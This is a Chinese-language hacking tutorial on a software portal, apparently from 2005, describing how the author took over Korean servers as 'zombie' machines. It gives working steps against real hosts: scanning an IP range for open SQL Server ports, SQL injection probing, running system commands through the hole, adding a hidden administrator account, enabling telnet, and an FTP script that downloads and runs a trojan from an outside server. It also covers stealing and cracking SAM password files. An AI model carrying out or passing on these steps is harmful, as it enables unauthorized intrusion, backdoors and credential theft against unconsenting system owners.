文章分类 | 推荐文章 | 最新文章 | 热点文章 | 最新软件 | 精品软件 | 下载排行 | 推荐下载 | 免费看大片 | WPS | 杀毒软件
清风网络
首 页 软件下载 网络学院 数码学院
QQ 电脑入门 游戏 操作系统 图形处理 办公软件 媒体动画 精文荟萃 工具软件 网络编程 程序开发 网络技术 认证考试 网站建设 文章专栏
当前位置:清风网络学院网络技术网络安全我是这样走进韩国肉鸡的
精品推荐
特别推荐
·无线入侵的技术细节
·SQL注入和CSS攻击的检测
·详解:五种Windows常用密码设置
·浅析黑客攻击时的常用方法和攻击步骤
·不怕攻击 家庭上网必学八招安全绝招
·入门者如何获取肉鸡
·Linux安全配置步骤简述
·Wi-Fi网络安全探讨及组网策略
·网页病毒的概念
·保障您网站安全的十点技巧
·技巧:网上交易密码保护的几种窍门
·六个简单方法防止上网被钓鱼
·PING命令的小秘密
·安全第一 网络端口扫描技术介绍
·十大网络工具帮你审核网络安全
·信息安全问题需解决方案
·多角度详细解释网站安全保护方法
·端口截听实现端口隐藏,嗅叹与攻击
·用Win NT/2K 建WEB站点安全指南
·实现 Web 应用程序安全的捷径
热点TOP10
·解析远程控制带来的安全危险
·不怕攻击 家庭上网必学八招安全绝招
·内网数据库服务器入侵实战
·MD5 Password Cracker 一个国外的md5爆破工具(速度极快)
·安全漏洞的起因:ActiveX技术安全报告
·黑客攻击步骤-如何获得IP
·认识映象劫持技术原理与解决办法
·保障您网站安全的十点技巧
·交换环境下SNIFFER的攻击技术手段
·防范于未然 2008五大企业安全问题预测
·假冒腾讯qq网络骗子欺诈骗术大曝光
·企业安全 减少内部安全风险的10种方法
·让尘封的DOS机莺歌燕舞欢喜过大年
·确保数据中心虚拟化安全10个步骤
·2007年12月十大网络安全漏洞综述
·大网站是保障网络安全的技巧
·检查并堵住网站的eWebEditor漏洞
·面临什么新威胁 PC安全终极指南
·深入理解防火墙 屏蔽外界攻击
·预防网络病毒的几个忠告

我是这样走进韩国肉鸡的

日期:2005年10月30日 作者: 查看:[大字体 中字体 小字体]


由于最近要破解一个文件迫切需要一台"高速"肉鸡用,所以想找个现成的,发现很多论坛发布sql肉鸡,不过经过我测试(利用sqltools上传程序,提示成功,但就是找不到文件)很多都不能用,可能对方的杀毒软件把你的给杀了,也可能是对方的磁盘不允许修改,帐户权限低,下

面我们换一种思路来走进sql主机。

为了找到一台合适的肉鸡,自己来动手吧,首先锁定目标,用ip数据库查询器查找韩国或者日本的ip(只要不是中国的就行),拿出scanner

来扫描开放80和1433端口的主机,因为我们是利用web程序来查找开放大门主机,所以要扫描开放1433服务的主机。cmd下进入scanner所在的目

录,输入命令:scanner TCP 168.188.0.0 168.188.255.255 80,1433 400 /save 然后运行,意思是系统用400线程扫描该段80和1433端口开

放的主机,并将结果保存,好了,让他扫描吧,扫描结束后在该目录下的result.txt中保存结果。打开result.txt,里面已经有不少符合条件

主机等着我们的光临。随便复制一个ip 168.188.xxx.xxx,打开浏览器,访问该网站,访问该网站的分页面,

http://168.188.xxx.xxx/read.asp?page=1&no=16,在后面加入的and 1=1页面显示正常,输入 and 1=2出现错误:

Microsoft OLE DB Provider for SQL Server error '80040e14'

Incorrect syntax near the keyword 'where'.

/movie/movie.asp, line 128

好,该主机存在漏洞,那就拿下他。这次我用另外一个小工具GYSIcmd来打开进入主机的小门,该工具能够利用利用网站程序漏洞运行DOS命令

,在注入地址中输入http://168.188.xxx.xxx/read.asp?page=1&no=16,然后在DOS命令中输入net start telnet ,现在已开启了telnet服务

,接着执行net user qq qq123 /add为进入主机添加一个帐号,提升为管理员net localgroup administrators qq /add ,到此已经完成了进入

前的准备工作.
下面在为进入主机铺上一条小路,我们好从这上面走过去呀。 在桌面上新建一个CMD快捷方式,指向C:\WINNT\system32\CMD.EXE ,选中属

性中的以其他用户身份运行。现在运行该程序,在用户中用我们刚才建立的用户qq(qq123)运行,直接运行telnet 168.188.xxx.xxx ,提示是

否发送密码,输入y,这就进入了主机。呵呵,偷偷的进了人家屋里了,该控制了,下面来给它传文件,传个反弹木马,或者开3389,由于我的

速度很慢,就不在我机子上开tftp服务了,直接用一个批处理文件来传送,输入:

echo open ftp.myweb.com 21>ftp.txt
echo name>>ftp.txt
echo password>>ftp.txt
echo get hack.exe>>ftp.txt
echo bye

一次一行,输入完后就在对方根目录下有了一个文件ftp.txt,下面执行:
ftp -s:ftp.txt
在屏幕上可看到一行行的显示执行,你能看到执行的过程,他是看不到的,文件传完了,删除该文件del ftp.txt
运行hack.exe,好,打开我机子上的鸽子,显示有主机上线,呵呵,到手了,任务完成了,想干什么就做吧,不过奉劝一句,不要破坏,即使

是国外的机子,要不要删他的数据,除非反华的或者色情站点。如果想更方便的控制,可给他开3389。然后登陆3389进行管理,帮他补上漏洞(

作雷锋了)..
在我进入的主机中,碰到的情况是不一样的,有的主机已开了3389,可以利用命令query user 查看主机在线人员,如果管理员在线,通时还有

人使用3389登陆到了主机,那么很可能就是已经被人捷足先登了,踢他出去logoff 1 ,怎么办在自己了.
如果传送上去的文件无法运行,那就说明对方已经禁止运行权限,只是允许某个特定的用户有运行权限,这时可以传他的sam文件,进入

C:\WINNT\repair>目录,利用FTP的上传功能,来破解他的用户密码。破解sam密码的软件很多,如LC,最近不是出了一款新的,好象叫

SAMinside.破解出来密码后,挨着试试,一般不会超过6个用户,定有一个帐户有运行权限。如果都不行,那么还有一个方法...不过该方法虽

能运行,但运行后管理员登陆就能发现主机被人入侵,所以就不说了,谁有更好后的办法运行,多多指教。
方法不局限于一点 一个学习网络安全的爱好者 也切忌把自己的思维固定在一点 ,一定要活跃 还要在踏上这条路的时候 一定要学会好好使用

[1] [2] 下一页 




上一篇:侵入最大的六合彩论坛系统---六合专用BBS

下一篇:104种木马的清除方法

我是这样走进韩国肉鸡的 相关文章:
·韩国素材下载:精美小房屋矢量图标
·QQ空间韩国雪景代码
·国内首发 韩国版QQ自定义头像
·情书大全|【求爱情书】我是这样爱上你的
·高手都是这样清除系统垃圾的
·走进反垃圾邮件研究 透视最新技术动向
·菜鸟必读:你的QQ号码、Q币这样被盗
·菜鸟必读:你的QQ号码、Q币就这样被盗
·系统技巧:轻轻松松输入韩国字
·百度是这样清除黄色图片的
我是这样走进韩国肉鸡的 相关软件:
·韩国跆拳道MTV
·韩国TOEIC TEST MP3 13
·韩国语入门mp3(1B)
·韩国语三百句
·韩国模仿偶像 杰克逊 太空舞现场
·鱼不是这样随便钓的
·05WCG:韩国8强赛录象
·《星际争霸》韩国Only战队StarLeague录像包
·《魔兽》录像:韩国鬼王lucifer比赛集锦
·《卓越之剑GE》韩国2.0版宣传篇清晰版

特别声明:本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。
[打印本页] [关闭窗口] 转载请注明来源:http://www.vipcn.com
| 帮助(?) | 版权声明 | 友情连接 | 关于我们 | 信息发布
Copyright 2007 www.vipcn.com All Rights Reserved. 鄂ICP备05000083号Powered by:vipcn